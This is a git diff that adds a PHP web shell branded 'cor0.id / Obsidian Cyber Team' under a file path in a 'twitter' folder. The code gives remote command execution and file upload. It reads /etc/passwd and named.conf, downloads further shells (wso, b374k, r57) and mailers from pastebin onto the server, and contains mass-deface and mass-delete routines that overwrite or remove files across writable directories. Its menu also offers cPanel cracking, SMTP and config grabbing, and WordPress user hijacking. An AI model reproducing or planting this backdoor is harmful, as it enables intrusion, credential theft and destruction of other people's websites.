diff --git a/php/twitter/qyt0dHv1.php b/php/twitter/qyt0dHv1.php new file mode 100644 index 0000000..0dea40f --- /dev/null +++ b/php/twitter/qyt0dHv1.php @@ -0,0 +1,4255 @@ + + +
+++ +
+++ _..__. .__.._ +.^"-.._ '-(\__/)-' _..-"^. +'-.' oo '.-' + `-..-' ++cor0.id
+___________________________ +< root@coro.id whuttt??? > +--------------------------- +Obsidian Cyber Team + ++ + + + +cor0.id + + + + +".$perm.""; + } else { + return "".$perm.""; + } +} + function UrlLoop($url,$type){ + + $urlArray = array(); + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + $result = curl_exec($ch); + + $regex='|= 1073741824) +return sprintf('%1.2f',$s / 1073741824 ).' GB'; +elseif($s >= 1048576) +return sprintf('%1.2f',$s / 1048576 ) .' MB'; +elseif($s >= 1024) +return sprintf('%1.2f',$s / 1024 ) .' KB'; +else +return $s .' B'; +} +function ambilKata($param, $kata1, $kata2){ + if(strpos($param, $kata1) === FALSE) return FALSE; + if(strpos($param, $kata2) === FALSE) return FALSE; + $start = strpos($param, $kata1) + strlen($kata1); + $end = strpos($param, $kata2, $start); + $return = substr($param, $start, $end - $start); + return $return; +} +if(get_magic_quotes_gpc()) { + function idx_ss($array) { + return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array); + } + $_POST = idx_ss($_POST); +} +function CreateTools($names,$lokasi){ + if ( $_GET['create'] == $names ){ + $a= "".$_SERVER['SERVER_NAME'].""; +$b= dirname($_SERVER['PHP_SELF']); +$c = "/coro.id/".$names.".php"; +if (file_exists('coro.id/'.$names.'.php')){ + echo ' '; + } + else {mkdir("coro.id", 0777); +file_put_contents('coro.id/'.$names.'.php', file_get_contents($lokasi)); +echo ' ';}}} + +CreateTools("wso","http://pastebin.com/raw/3eh3Gej2"); +CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php"); +CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV"); +CreateTools("injection","http://pastebin.com/raw/nxxL8c1f"); +CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq"); +CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV"); +CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi"); +CreateTools("tokopedia","http://pastebin.com/dvhzWgby"); +CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ"); +CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj"); +CreateTools("r57","http://pastebin.com/raw/G2VEDunW"); +CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL"); +CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL"); +CreateTools("bh","http://pastebin.com/raw/3L2ESWeu"); +CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X"); +if(isset($_GET['dir'])) { + $dir = $_GET['dir']; + chdir($_GET['dir']); +} else { + $dir = getcwd(); +} +$dir = str_replace("\\","/",$dir); +$scdir = explode("/", $dir); +$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; +$ling="http://".$_SERVER['SERVER_NAME']."" .$_SERVER['PHP_SELF']."?create"; +$ds = @ini_get("disable_functions"); +$mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; +$curl = (function_exists('curl_version')) ? "ON" : "OFF"; +$wget = (exe('wget --help')) ? "ON" : "OFF"; +$perl = (exe('perl --help')) ? "ON" : "OFF"; +$python = (exe('python --help')) ? "ON" : "OFF"; +$show_ds = (!empty($ds)) ? "$ds" : "NONE"; +if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; +} else { + $uid = @posix_getpwuid(posix_geteuid()); + $gid = @posix_getgrgid(posix_getegid()); + $user = $uid['name']; + $uid = $uid['uid']; + $group = $gid['name']; + $gid = $gid['gid']; +} +$d0mains = @file("/etc/named.conf"); + $users=@file('/etc/passwd'); + if($d0mains) + { + $count; + foreach($d0mains as $d0main) + { + if(@ereg("zone",$d0main)) + { + preg_match_all('#zone "(.*)"#', $d0main, $domains); + flush(); + if(strlen(trim($domains[1][0])) > 2) + { + flush(); + $count++; + } + } + } + } + +$sport=$_SERVER['SERVER_PORT']; +echo " "; +echo "
"; +echo " System: ".php_uname()." "; +echo " User: ".$user." (".$uid.") Group: ".$group." (".$gid.") "; +echo " Server IP: ".gethostbyname($_SERVER['HTTP_HOST'])." | Your IP: ".$_SERVER['REMOTE_ADDR']." "; +echo " HDD: ".hdd(disk_free_space("/"))." / ".hdd(disk_total_space("/"))." "; +echo " Websites : $count Domains "; +echo " Port : $sport "; +echo " Safe Mode: $sm "; + +echo " Disable Functions: $show_ds "; +echo " MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl Current DIR: "; +foreach($scdir as $c_dir => $cdir) { + echo "$cdir/"; +} +echo " "; +echo "
"; +echo ""; +echo " "; +echo ""; +echo "
"; +echo "- [ Home ]
"; +echo "- [ Upload ]
"; +echo "- [ Command ]
"; +echo "- [ Mass Deface ]
"; +echo "- [ Config ]
"; +echo "- [ Config 2 ]
"; +echo "- [ jumping ]
"; +echo "- [ Symlink ]
"; +echo "- [ CPanel Crack ]
"; +echo "- [ CPanel/FTP Auto Deface ]
"; +echo "- [ SMTP Grabber ]
"; +echo "- [ Zone-H ]
"; +echo "- [ Defacer.ID ]
"; +echo "- [ CGI Telnet ]
"; +echo "- [ Adminer ]
"; +echo "- [ Fake Root ]
"; +echo "- [ Auto Edit User ]
"; +echo "- [ Auto Edit Title WordPress ]
"; +echo "- [ WordPress Auto Deface ]
"; +echo "- [ WordPress Auto Deface V.2 ]
"; +echo "- [ WordPress Auto Edit User V.2 ]
"; +echo "- [ Joomla Auto Edit User V.2 ]
"; +echo "- [ Bypass etc/passw ]
"; +echo "- [ Log Hunter ]
"; +echo "- [ Shell Checker ]
"; +echo "- [ Shell Finder ]
"; +echo "- [ Zip Menu ]
"; +echo "- [ Code Inject ]
"; +echo "- [ About ]
"; +echo "- [ Magento DB Info ]
"; +echo "- [ LogOut ]
"; +echo "
"; +if($_GET['do'] == 'upload') { + echo ""; + if($_POST['upload']) { + if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { + $act = "Berhasil Horee! at $dir/".$_FILES['ix_file']['name'].""; + } else { + $act = "Yahh Gagal"; + } + } + echo "Upload File: [ ".w($dir,"Writeable")." ]"; + echo $act; + echo " "; +} + elseif($_GET['do'] == 'cmd') { + if($_POST['do_cmd']) { + echo "".exe($_POST['cmd']).""; + } +} elseif($_GET['do'] == 'mass_deface') { + echo ""; + } + else { + echo " [-] Ternyata Tidak Boleh Menyabun Disini :(
"; + } + } + function hapus_massal($dir,$namafile) { + if(is_writable($dir)) { + $dira = scandir($dir); + foreach($dira as $dirb) { + $dirc = "$dir/$dirb"; + $lokasi = $dirc.'/'.$namafile; + if($dirb === '.') { + if(file_exists("$dir/$namafile")) { + unlink("$dir/$namafile"); + } + } elseif($dirb === '..') { + if(file_exists("".dirname($dir)."/$namafile")) { + unlink("".dirname($dir)."/$namafile"); + } + } else { + if(is_dir($dirc)) { + if(is_writable($dirc)) { + if(file_exists($lokasi)) { + echo "[DELETED] $lokasi
"; + unlink($lokasi); + $idx = hapus_massal($dirc,$namafile); + } + } + } + } + } + } + } + function clear_fill($file,$index){ + if(file_exists($file)){ + $handle = fopen($file,'w'); + fwrite($handle,''); + fwrite($handle,$index); + fclose($handle); } } + + function gass(){ + global $dirr , $index ; + chdir($dirr); + $me = str_replace(dirname(__FILE__).'/','',__FILE__); + $files = scandir($dirr) ; + $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..","."); + sort($files); + $n = 0 ; + foreach ($files as $file){ + if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) { + echo "$dirr/$file ====> "; + edit_file($file,$index); + flush(); + $n = $n +1 ; + } + } + echo "
"; + echo "$n Kali Anda Telah Ngecrot Disini
"; + } + function ListFiles($dirrall) { + + if($dh = opendir($dirrall)) { + + $files = Array(); + $inner_files = Array(); + $me = str_replace(dirname(__FILE__).'/','',__FILE__); + $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db"); + while($file = readdir($dh)) { + if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) { + if(is_dir($dirrall . "/" . $file)) { + $inner_files = ListFiles($dirrall . "/" . $file); + if(is_array($inner_files)) $files = array_merge($files, $inner_files); + } else { + array_push($files, $dirrall . "/" . $file); + } + } + } + + closedir($dh); + return $files; + } + } + function gass_all(){ + global $index ; + $dirrall=$_POST['d_dir']; + foreach (ListFiles($dirrall) as $key=>$file){ + $file = str_replace('//',"/",$file); + echo "$file ===>"; + edit_file($file,$index); + flush(); + } + $key = $key+1; + echo " "; + } + } +elseif($_GET['do'] == 'magen') { +echo' +$key Kali Anda Telah Ngecrot Disini
"; } + function sabun_massal($dir,$namafile,$isi_script) { + if(is_writable($dir)) { + $dira = scandir($dir); + foreach($dira as $dirb) { + $dirc = "$dir/$dirb"; + $lokasi = $dirc.'/'.$namafile; + if($dirb === '.') { + file_put_contents($lokasi, $isi_script); + } elseif($dirb === '..') { + file_put_contents($lokasi, $isi_script); + } else { + if(is_dir($dirc)) { + if(is_writable($dirc)) { + echo "[Berhasil] $lokasi
"; + file_put_contents($lokasi, $isi_script); + $idx = sabun_massal($dirc,$namafile,$isi_script); + } + } + } + } + } + } + if($_POST['mass'] == 'onedir') { + echo "
Versi Text Area
Versi Text
\n"; + $mainpath=$_POST[d_dir];$file=$_POST[d_file]; + $dir=opendir("$mainpath"); + $code=base64_encode($_POST[script]); + $indx=base64_decode($code); + while($row=readdir($dir)){$start=@fopen("$row/$file","w+"); + $finish=@fwrite($start,$indx); + if ($finish){echo 'http://' . $row . '/' . $file . '
'; } + } + + } + elseif($_POST['mass'] == 'sabunkabeh') { gass(); } + elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); } + elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); } + elseif($_POST['mass'] == 'massdeface') { + echo ""; + sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); + echo ""; } + else { + echo " ++ Select Type:
+ +
+ Folder:
+
+ Filename:
+
+ Index File:
+
+ +++
+